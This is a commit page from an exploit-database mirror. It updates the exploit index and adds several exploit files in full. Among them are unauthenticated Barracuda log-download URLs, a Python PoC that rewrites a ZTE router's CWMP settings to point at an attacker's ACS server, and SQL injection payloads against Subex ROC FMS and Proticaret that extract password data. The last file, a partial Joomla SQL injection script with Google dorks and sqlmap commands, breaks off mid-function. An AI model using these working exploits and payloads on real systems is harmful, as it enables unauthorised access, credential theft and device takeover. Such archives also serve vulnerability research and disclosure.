bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 11_18_2014

Browse source
This commit is contained in:
Offensive Security 2014-11-18 04:48:27 +00:00
parent 8484833cfa
commit 892f0c3055
28 changed files with 1373 additions and 209 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

28
files.csv
View file

@ -9035,7 +9035,7 @@ id,file,description,date,author,platform,type,port
9572,platforms/php/webapps/9572.txt,"DataLife Engine 8.2 dle_config_api Remote File Inclusion Vulnerability",2009-09-01,Kurd-Team,php,webapps,0 9572,platforms/php/webapps/9572.txt,"DataLife Engine 8.2 dle_config_api Remote File Inclusion Vulnerability",2009-09-01,Kurd-Team,php,webapps,0
9573,platforms/windows/dos/9573.pl,"dTunes 2.72 (Filename Processing) Local Format String PoC",2009-09-01,TheLeader,windows,dos,0 9573,platforms/windows/dos/9573.pl,"dTunes 2.72 (Filename Processing) Local Format String PoC",2009-09-01,TheLeader,windows,dos,0
9574,platforms/linux/local/9574.txt,"Linux Kernel < 2.6.19 - udp_sendmsg Local Root Exploit (x86/x64)",2009-09-02,spender,linux,local,0 9574,platforms/linux/local/9574.txt,"Linux Kernel < 2.6.19 - udp_sendmsg Local Root Exploit (x86/x64)",2009-09-02,spender,linux,local,0
9575,platforms/linux/local/9575.c,"Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit",2009-09-02,Andi,linux,local,0 9575,platforms/linux/local/9575.c,"Linux Kernel < 2.6.19 - udp_sendmsg Local Root Exploit",2009-09-02,Andi,linux,local,0
9576,platforms/php/webapps/9576.txt,"Discuz! Plugin JiangHu <= 1.1 (id) SQL Injection Vulnerability",2009-09-02,ZhaoHuAn,php,webapps,0 9576,platforms/php/webapps/9576.txt,"Discuz! Plugin JiangHu <= 1.1 (id) SQL Injection Vulnerability",2009-09-02,ZhaoHuAn,php,webapps,0
9577,platforms/php/webapps/9577.txt,"Ve-EDIT 0.1.4 (highlighter) Remote File Inclusion Vulnerability",2009-09-02,RoMaNcYxHaCkEr,php,webapps,0 9577,platforms/php/webapps/9577.txt,"Ve-EDIT 0.1.4 (highlighter) Remote File Inclusion Vulnerability",2009-09-02,RoMaNcYxHaCkEr,php,webapps,0
9578,platforms/php/webapps/9578.txt,"PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability",2009-09-02,v3n0m,php,webapps,0 9578,platforms/php/webapps/9578.txt,"PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability",2009-09-02,v3n0m,php,webapps,0
@ -31663,6 +31663,7 @@ id,file,description,date,author,platform,type,port
35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection Vulnerability",2010-12-28,"non customers",php,webapps,0 35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection Vulnerability",2010-12-28,"non customers",php,webapps,0
35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 Cross Site Scripting Vulnerability",2010-12-23,"Gjoko Krstic",multiple,remote,0 35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 Cross Site Scripting Vulnerability",2010-12-23,"Gjoko Krstic",multiple,remote,0
35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 'range' Parameter SQL Injection Vulnerability",2010-12-27,Dr.NeT,php,webapps,0 35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 'range' Parameter SQL Injection Vulnerability",2010-12-27,Dr.NeT,php,webapps,0
35146,platforms/php/webapps/35146.txt,"PHP 5.x - Bypass Disable Functions (via Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0 35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0
35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 'Track' Module 'server.php' Cross Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 'Track' Module 'server.php' Cross Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0
35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
@ -31673,6 +31674,7 @@ id,file,description,date,author,platform,type,port
35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0 35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0
35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0 35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0
35158,platforms/windows/dos/35158.py,"Mongoose 2.11 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0 35158,platforms/windows/dos/35158.py,"Mongoose 2.11 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0
35159,platforms/php/webapps/35159.txt,"Modx CMS 2.2.14 - CSRF Bypass, Reflected XSS, Stored XSS Vulnerability",2014-11-05,"Narendra Bhati",php,webapps,0
35160,platforms/php/webapps/35160.txt,"Mouse Media Script 1.6 0 - Stored XSS Vulnerability",2014-11-05,"Halil Dalabasmaz",php,webapps,0 35160,platforms/php/webapps/35160.txt,"Mouse Media Script 1.6 0 - Stored XSS Vulnerability",2014-11-05,"Halil Dalabasmaz",php,webapps,0
35161,platforms/linux/local/35161.txt,"Linux Local Root => 2.6.39 (32-bit & 64-bit) - Mempodipper #2",2012-01-12,zx2c4,linux,local,0 35161,platforms/linux/local/35161.txt,"Linux Local Root => 2.6.39 (32-bit & 64-bit) - Mempodipper #2",2012-01-12,zx2c4,linux,local,0
35162,platforms/linux/dos/35162.cob,"GIMP <= 2.6.7 Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0 35162,platforms/linux/dos/35162.cob,"GIMP <= 2.6.7 Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0
@ -31702,19 +31704,25 @@ id,file,description,date,author,platform,type,port
35189,platforms/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local,0 35189,platforms/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local,0
35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0 35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0
35191,platforms/php/webapps/35191.txt,"CMS Tovar 'tovar.php' SQL Injection Vulnerability",2011-01-11,jos_ali_joe,php,webapps,0 35191,platforms/php/webapps/35191.txt,"CMS Tovar 'tovar.php' SQL Injection Vulnerability",2011-01-11,jos_ali_joe,php,webapps,0
35193,platforms/php/webapps/35193.txt,"vldPersonals 2.7 Multiple Vulnerabilities",2014-11-10,"Mr T",php,webapps,0
35197,platforms/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",php,webapps,0 35197,platforms/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",php,webapps,0
35198,platforms/php/webapps/35198.txt,"phpSound Music Sharing Platform 1.0.5 - Multiple XSS Vulnerabilities",2014-11-10,"Halil Dalabasmaz",php,webapps,0 35198,platforms/php/webapps/35198.txt,"phpSound Music Sharing Platform 1.0.5 - Multiple XSS Vulnerabilities",2014-11-10,"Halil Dalabasmaz",php,webapps,0
35202,platforms/windows/dos/35202.py,"Internet Explorer 11 - Denial Of Service",2014-11-10,"Behrooz Abbassi",windows,dos,0
35203,platforms/hardware/webapps/35203.txt,"ZTE ZXDSL 831CII - Insecure Direct Object Reference",2014-11-10,"Paulos Yibelo",hardware,webapps,0 35203,platforms/hardware/webapps/35203.txt,"ZTE ZXDSL 831CII - Insecure Direct Object Reference",2014-11-10,"Paulos Yibelo",hardware,webapps,0
35204,platforms/php/webapps/35204.txt,"Another Wordpress Classifieds Plugin - SQL Injection",2014-11-10,dill,php,webapps,0 35204,platforms/php/webapps/35204.txt,"Another Wordpress Classifieds Plugin - SQL Injection",2014-11-10,dill,php,webapps,0
35205,platforms/linux/shellcode/35205.txt,"Position independent & Alphanumeric 64-bit execve(""/bin/sh\0"",NULL,NULL); (87 bytes)",2014-11-10,Breaking.Technology,linux,shellcode,0 35205,platforms/linux/shellcode/35205.txt,"Position independent & Alphanumeric 64-bit execve(""/bin/sh\0"",NULL,NULL); (87 bytes)",2014-11-10,Breaking.Technology,linux,shellcode,0
35206,platforms/php/webapps/35206.txt,"PHP-Fusion 7.02.07 - SQL Injection",2014-11-10,"Mauricio Correa",php,webapps,0 35206,platforms/php/webapps/35206.txt,"PHP-Fusion 7.02.07 - SQL Injection",2014-11-10,"Mauricio Correa",php,webapps,0
35208,platforms/hardware/webapps/35208.txt,"Barracuda - Multiple Anauthentificated Logfile Download",2014-11-10,4CKnowLedge,hardware,webapps,0
35209,platforms/jsp/webapps/35209.txt,"ManageEngine OpManager, Social IT Plus and IT360 - Multiple Vulnerabilities",2014-11-10,"Pedro Ribeiro",jsp,webapps,0 35209,platforms/jsp/webapps/35209.txt,"ManageEngine OpManager, Social IT Plus and IT360 - Multiple Vulnerabilities",2014-11-10,"Pedro Ribeiro",jsp,webapps,0
35210,platforms/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",multiple,webapps,0 35210,platforms/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",multiple,webapps,0
35211,platforms/java/remote/35211.rb,"Visual Mining NetCharts Server Remote Code Execution",2014-11-10,metasploit,java,remote,8001 35211,platforms/java/remote/35211.rb,"Visual Mining NetCharts Server Remote Code Execution",2014-11-10,metasploit,java,remote,8001
35212,platforms/php/webapps/35212.txt,"XCloner Wordpress/Joomla! Plugin - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",php,webapps,80 35212,platforms/php/webapps/35212.txt,"XCloner Wordpress/Joomla! Plugin - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",php,webapps,80
35214,platforms/multiple/webapps/35214.txt,"Subex FMS 7.4 - Unauthenticated SQLi",2014-11-11,"Anastasios Monachos",multiple,webapps,0
35216,platforms/windows/local/35216.py,"MS Office 2007 and 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0 35216,platforms/windows/local/35216.py,"MS Office 2007 and 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0
35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File (CdrTxt.dll) Off-By-One Stack Corruption Vulnerability",2014-11-12,LiquidWorm,windows,dos,0 35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File (CdrTxt.dll) Off-By-One Stack Corruption Vulnerability",2014-11-12,LiquidWorm,windows,dos,0
35218,platforms/php/webapps/35218.txt,"WordPress SupportEzzy Ticket System Plugin 1.2.5 - Stored XSS Vulnerability",2014-11-12,"Halil Dalabasmaz",php,webapps,80 35218,platforms/php/webapps/35218.txt,"WordPress SupportEzzy Ticket System Plugin 1.2.5 - Stored XSS Vulnerability",2014-11-12,"Halil Dalabasmaz",php,webapps,80
35219,platforms/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection",2014-11-13,"Onur Alanbel (BGA)",multiple,webapps,0
35220,platforms/multiple/webapps/35220.txt,"Joomla HD FLV Player < 2.1.0.1 - SQL Injection Vulnerability",2014-11-13,"Claudio Viviani",multiple,webapps,0
35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 (picture.php, rate param) - SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80 35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 (picture.php, rate param) - SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80
35222,platforms/jsp/webapps/35222.txt,"F5 BIG-IP 10.1.0 - Directory Traversal Vulnerability",2014-11-13,"Anastasios Monachos",jsp,webapps,0 35222,platforms/jsp/webapps/35222.txt,"F5 BIG-IP 10.1.0 - Directory Traversal Vulnerability",2014-11-13,"Anastasios Monachos",jsp,webapps,0
35223,platforms/php/webapps/35223.txt,"Digi Online Examination System 2.0 - Unrestricted File Upload",2014-11-13,"Halil Dalabasmaz",php,webapps,80 35223,platforms/php/webapps/35223.txt,"Digi Online Examination System 2.0 - Unrestricted File Upload",2014-11-13,"Halil Dalabasmaz",php,webapps,80
@ -31740,4 +31748,22 @@ id,file,description,date,author,platform,type,port
35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/workingSetManager.jsp workingSet Parameter XSS",2008-04-24,Rob,multiple,remote,0 35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/workingSetManager.jsp workingSet Parameter XSS",2008-04-24,Rob,multiple,remote,0
35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 Malformed Message Denial Of Service Vulnerability",2011-01-19,"Craig Freyman",windows,dos,0 35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 Malformed Message Denial Of Service Vulnerability",2011-01-19,"Craig Freyman",windows,dos,0
35245,platforms/php/webapps/35245.txt,"PHPAuctions 'viewfaqs.php' SQL Injection Vulnerability",2011-01-19,"BorN To K!LL",php,webapps,0 35245,platforms/php/webapps/35245.txt,"PHPAuctions 'viewfaqs.php' SQL Injection Vulnerability",2011-01-19,"BorN To K!LL",php,webapps,0
35246,platforms/php/webapps/35246.py,"Joomla HD FLV Player < 2.1.0.1 - Arbitrary File Download Vulnerability",2014-11-15,"Claudio Viviani",php,webapps,0
35248,platforms/multiple/webapps/35248.txt,"clientResponse Client Management 4.1 - XSS Vulnerability",2014-11-15,"Halil Dalabasmaz",multiple,webapps,0
35251,platforms/php/webapps/35251.txt,"Pixie CMS 1.0.4 'admin/index.php' SQL Injection Vulnerability",2011-01-20,"High-Tech Bridge SA",php,webapps,0 35251,platforms/php/webapps/35251.txt,"Pixie CMS 1.0.4 'admin/index.php' SQL Injection Vulnerability",2011-01-20,"High-Tech Bridge SA",php,webapps,0
35252,platforms/multiple/remote/35252.php,"libxml2 2.6.x 'XMLWriter::writeAttribute()' Memory Leak Information Disclosure Vulnerability",2011-01-24,"Kees Cook",multiple,remote,0
35253,platforms/php/webapps/35253.txt,"web@all 1.1 'url' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
35254,platforms/php/webapps/35254.txt,"PivotX 2.2.2 'module_image.php' Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
35255,platforms/php/webapps/35255.txt,"WordPress Uploader Plugin 1.0 'num' Parameter Cross Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0
35256,platforms/cfm/webapps/35256.txt,"ActiveWeb Professional 3.0 Arbitrary File Upload Vulnerability",2011-01-25,StenoPlasma,cfm,webapps,0
35257,platforms/php/webapps/35257.txt,"WordPress Videox7 UGC Plugin 2.5.3.2 'listid' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
35258,platforms/php/webapps/35258.txt,"WordPress Audio Plugin 0.5.1 'showfile' Parameter Cross Site Scripting Vulnerability",2011-01-23,"AutoSec Tools",php,webapps,0
35259,platforms/php/webapps/35259.txt,"PivotX 2.2 pivotx/includes/blogroll.php color Parameter XSS",2011-01-25,"High-Tech Bridge SA",php,webapps,0
35260,platforms/php/webapps/35260.txt,"PivotX 2.2 pivotx/includes/timwrapper.php src Parameter XSS",2011-01-25,"High-Tech Bridge SA",php,webapps,0
35261,platforms/php/webapps/35261.txt,"RSS Feed Reader WordPress Plugin 0.1 'rss_url' Parameter Cross Site Scripting Vulnerability",2011-01-23,"AutoSec Tools",php,webapps,0
35262,platforms/php/webapps/35262.txt,"WordPress WP Featured Post with Thumbnail Plugin 3.0 'src' Parameter Cross Site Scripting Vulnerability",2011-01-23,"AutoSec Tools",php,webapps,0
35263,platforms/php/webapps/35263.txt,"WordPress WP Publication Archive Plugin 2.0.1 'file' Parameter Information Disclosure Vulnerability",2011-01-23,"AutoSec Tools",php,webapps,0
35264,platforms/php/webapps/35264.txt,"WordPress Featured Content Plugin 0.0.1 'listid' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 'uploadImage.php' Arbitrary File Upload Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Stored XSS Vulnerability",2014-11-17,"Avinash Thapa",php,webapps,0
35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,0

Can't render this file because it is too large.

11
platforms/cfm/webapps/35256.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/45985/info
ActiveWeb Professional is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; successful exploits will allow attackers to completely compromise the affected computer.
Lomtec ActiveWeb Professional 3.0 is vulnerable; other versions may also be affected.
1. Go to the page http://www.example.com/activeweb/EasyEdit.cfm?module=EasyEdit&page=getimagefile&Filter=
2. Change the 'UploadDirectory' and 'Accepted Extensions' hidden form fields to upload the malicious file to the directory of interest.

47
platforms/hardware/webapps/35208.txt Executable file
View file

@ -0,0 +1,47 @@
# Exploit Title: multiple Barracuda products logfile disclosure
# Date: 03/26/2014
# Exploit Author: Juergen Grieshofer / 4CKnowLedge
# Author Homepage: https://4ck.eu/
# Vendor Homepage: https://barracudalabs.com
# Software Link: https://firewall.ptest.cudasvc.com/
# Firmware v6.1.4.008 (2014-02-18 08:06:34)
# Modell: X300Vx
# BNSEC Nr: BNSEC-4189
-- Download logs without authentication --
$Logfiles
https://firewall.ptest.cudasvc.com/cgi-mod/logexport.cgi?password=&et=&primary_tab=LOGS&log_type=fw&auth_type=Local&user=admin&locale=de_DE&secondary_tab=bfw_fwlog&export_name=export.csv?&auth_type=Local&et=&locale=de_DE&password=&realm=&role=&user=admin&primary_tab=LOGS&filter_query_netstring={%22data%22%3A[{%22field%22%3A%22%22%2C%22operator%22%3A%22%3D%22%2C%22values%22%3A[%22%22]}]%2C%22conjunction%22%3A[%22AND%22]}
For further logfiles replace the values of [fw, access, http, network, vpn, svc]
Timeline:
Vendor contacted: 03/26/2014
Vendor generic ticket response: 03/28/2014
Vendor response: 05/16/2014
Vendor approved fix: 08/02/2014
Advice: Update firmware to latest release
# Software Link: https://webfilter.ptest.cudasvc.com/
# Firmware v7.0.1.006 (2013-12-12 14:51:33)
# Modell: 610VX
# BNSEC Nr: BNSEC-4230, BNSEC-2528, BNSEC-4232
-- Download logs without authentication --
$Weblog
https://webfilter.ptest.cudasvc.com/cgi-mod/spyware_log_data.cgi?auth_type=Local&et=&locale=en_US&password=&realm=&user=admin&primary_tab=BASIC&secondary_tab=spyware_log&message_total=
$Auditlog
https://webfilter.ptest.cudasvc.com/cgi-mod/audit_log_data.cgi?auth_type=Local&et=&locale=en_US&password=&user=admin&primary_tab=BASIC&secondary_tab=audit_log&message_total=
$Infectionlog
https://webfilter.ptest.cudasvc.com/cgi-mod/infection_log_data.cgi?auth_type=Local&et=&locale=en_US&password=&realm=&user=admin&primary_tab=BASIC&secondary_tab=infection_activity&message_total=
Timeline:
Vendor contacted: 04/01/2014
Vendor response: 05/16/2014
Vendor approved fix: 08/02/2014
Advice: Update firmware to latest release

62
platforms/hardware/webapps/35272.txt Executable file
View file

@ -0,0 +1,62 @@
# Exploit Title: ZTE ZXHN H108L Authentication Bypass
# Date: 14/11/2014
# Exploit Author: Project Zero Labs (https://projectzero.gr |
labs@projectzero.gr)
# Vendor Homepage: www.zte.com.cn
# Version: ZXHN H108LV4.0.0d_ZRQ_GR4
# Tested on: ZTE ZXHN H108L
# CVE : CVE-2014-8493
#Original post at
https://projectzero.gr/en/2014/11/zte-zxhn-h108l-authentication-bypass/
Description
===========
CWMP configuration is accessible only through the Administrator account.
CWMP is a protocol widely used by ISPs worldwide for remote provisioning
and troubleshooting subscribers' equipment. However editing the CWMP
parameters (more specifically sending the POST request) does not require
any user authentication.
Proof of Concept
================
#!/usr/bin/python
import requests
acs_server = "http://<server>:<port>"
acs_user = "user"
acs_pass = "pass"
# Connection request parameters. When a request is made to the following
URL, using the specified user/pass combination,
# router will connect back to the ACS server.
conn_url = "/tr069"
conn_port = "7564"
conn_user = "user"
conn_pass = "pass"
#Periodic inform parameters
active = 1
interval = 2000
payload = {'CWMP_active': '1', 'CWMP_ACSURL':
acs_server,'CWMP_ACSUserName': acs_user,'CWMP_ACSPassword': acs_pass,
'CWMP_ConnectionRequestPath': conn_url, 'CWMP_ConnectionRequestPort':
conn_port, 'CWMP_ConnectionRequestUserName': conn_user,
'CWMP_ConnectionRequestPassword': conn_pass, 'CWMP_PeriodActive':
active, 'CWMP_PeriodInterval': interval, 'CWMPLockFlag': '0' }
r = requests.post("http://192.168.1.254/Forms/access_cwmp_1",
data=payload)
Disclosure Timeline
===================
27/10/2014 - First communication attempt to both vendor and ISP
04/11/2014 - ZTE response stating that ISP should be contacted
03/11/2014 - Second attempt to contact the ISP.
14/11/2014 - No response from ISP. Public Disclosure

21
platforms/multiple/remote/35252.php Executable file
View file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/45973/info
The 'libxml2' library is prone to a local information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
<?php
# Copyright 2010, Canonical, Ltd.
# Author: Kees Cook <kees@ubuntu.com>
# License: GPLv3
#
# Proof-of-concept memory content leak
$xw = new XMLWriter();
$xw->openURI('php://output');
$xw->startElement('input');
$xw->writeAttribute('value', "\xe0\x81");
$xw->endElement();
?>

38
platforms/multiple/webapps/35214.txt Executable file
View file

@ -0,0 +1,38 @@
=======================================================================================
Subex ROC Fraud Management System v7.4 - Unauthenticated Blind-Time Based SQL Injection
=======================================================================================
Affected Software: Subex ROC FMS v7.4 (and probably earlier versions)
Vendor Homepage : http://www.subex.com/
Version : 7.4
Remote : Remote
Severity : Very High
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
CVE : CVE-2014-8728
[Summary]
A parameter at the login page of Subex ROC Fraud Management platform is vulnerable to blind-time based SQL injection.
[Vulnerability Details]
Authentication : The exploitation can be performed by any unauthenticated user.
Page : http://ip:port/login/login
Backend DB : Oracle
POST Parameter : ranger_user[name]
Sample HTTP POST Request - Data only:
-------------------------------------
ranger_user%5Bname%5D=admin%27%20AND%203402%3D%28CASE%20WHEN%20%28ASCII%28SUBSTRC%28%28SELECT%20%28CASE%20WHEN%20%28%28SELECT%20GRANTED_ROLE%20FROM%20DBA_ROLE_PRIVS%20WHERE%20GRANTEE%3DUSER%20AND%20GRANTED_ROLE%3DCHR%2868%29%7C%7CCHR%2866%29%7C%7CCHR%2865%29%29%3DCHR%2868%29%7C%7CCHR%2866%29%7C%7CCHR%2865%29%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%2C1%2C1%29%29%20%3E%2047%29%20THEN%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28102%29%7C%7CCHR%28100%29%7C%7CCHR%28114%29%2C5%29%20ELSE%203402%20END%29%20AND%20%27a%27%3D%27a&ranger_user%5Bpassword%5D=secuid0&commit=Login&ranger_user_i2%5Bfeatures%5D=0
Effect, the page will load with a delay of 5 seconds if the current database user is a member of the database administrators.
Using similar SQL statements an unauthenticated malicious visitor is able to enumerate various information from the backend database including those of usernames and password hashes (select ranger_user_name,hashed_password from ROCDB.PASSWORDS where rownum<2). The hashes can further be cracked and be used to access the application. Obviously if the DB user for the application has enough privileges you may be able to own the whole Oracle server.
[Timeline]
09/05/2012 - Advisory created, contacted Subex
15/05/2012 - Subex responded
15/05/2012 - Advisory details shared
17/05/2012 - Subex covered the issue in the latest patch cycle
30/08/2014 - Advisory published

105
platforms/multiple/webapps/35219.txt Executable file
View file

@ -0,0 +1,105 @@
Document Title:
============
Proticaret E-Commerce Script v3.0 >= SQL Injection
Release Date:
===========
13 Nov 2014
Product & Service Introduction:
========================
Proticaret is a free e-commerce script.
Abstract Advisory Information:
=======================
BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0
Vulnerability Disclosure Timeline:
=========================
20 Oct 2014 : Contact with Vendor
20 Nov 2014 : Vendor Response
June 26, 2014 : Patch Released
13 Nov 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Promist Bilgi ?leti?im Teknolojileri A.?
Product: Proticaret E-commerce Script v3.0 >=
Exploitation Technique:
==================
Remote, Unauthenticated
Severity Level:
===========
Critical
Technical Details & Description:
========================
SQL Injection
Proof of Concept (PoC):
==================
Proof of Concept
Request:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:GetProductCodes>
<!--Optional:-->
<tem:Code>1' from Users where (select top 1 password from users where userId=101)>1- -</tem:Code>
<!--Optional:-->
<tem:StartWith>?</tem:StartWith>
</tem:GetProductCodes>
</soapenv:Body>
</soapenv:Envelope>
Response:
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<soap:Fault>
<faultcode>soap:Server</faultcode>
<faultstring>System.Web.Services.Protocols.SoapException: Server was unable to process request. ---> System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'secretpassword' to data type int.
at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)
at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)
at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows)
at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more)
at System.Data.SqlClient.SqlDataReader.Read()
at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)
--- End of inner exception stack trace ---</faultstring>
<detail/>
</soap:Fault>
</soap:Body>
</soap:Envelope>
Solution Fix & Patch:
================
Apply the patch for v3.0
Security Risk:
==========
The risk of the vulnerabilities above estimated as critical.
Credits & Authors:
==============
Bilgi Güvenli?i Akademisi
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Domain: www.bga.com.tr
Social: twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA

198
platforms/multiple/webapps/35220.txt Executable file
View file

@ -0,0 +1,198 @@
#!/usr/bin/python
#
# Exploit Title : Joomla HD FLV 2.1.0.1 and below SQL Injection
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.hdflvplayer.net/
#
# Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
#
# Dork google 1: inurl:/component/hdflvplayer/
# Dork google 2: inurl:com_hdflvplayer
#
# Date : 2014-11-11
#
# Tested on : BackBox 3.x/4.x
#
# Info: The variable "id" is not sanitized (again)
# Over 80.000 downloads (statistic reported on official site)
#
#
# Video Demo: http://youtu.be/-EdOQSjAhW8
#
# Poc:
# http://www.target.it/index.php?option=com_hdflvplayer&id=1[Sqli]
# http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6 [SQLi]/page/1 (url rewrite)
#
# Poc sqlmap:
# sqlmap -u "http://www.target.it/index.php?option=com_hdflvplayer&id=1" -p id --dbms mysql
# sqlmap -u "http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6*" --dbms mysql (url rewrite)
#
# http connection
import urllib, urllib2
# string manipulation
import re
# Errors management
import sys
# Args management
import optparse
# Check url
def checkurl(url):
